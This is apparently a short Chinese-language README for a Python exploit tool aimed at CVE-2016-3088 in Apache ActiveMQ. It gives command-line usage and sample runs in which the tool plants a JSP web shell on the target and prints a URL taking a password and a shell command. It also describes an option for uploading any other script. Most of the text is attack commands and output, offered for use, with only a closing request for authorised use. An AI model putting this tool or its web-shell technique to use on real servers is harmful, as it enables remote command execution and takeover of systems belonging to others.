
基于Python的CVE-2016-3088漏洞利用脚本
一个基于Python的CVE-2016-3088利用脚本。
这是我的第一个脚本,所以可能有些地方不太合适。
但在我测试时它似乎运行正常。
该脚本可以在渗透CVE-2016-3088时省去抓包步骤,
从而让我们直接写入和移动文件。
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
参数--script是可选的,如果不带该参数运行程序,它将使用内置的有效载荷,
该有效载荷仅允许您在URL中执行一些命令。
但您可以输入其他脚本以达到您的目的。
只需下载.py文件。
并且它需要一些模块。
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp
请谨慎使用此工具,并仅在授权情况下使用!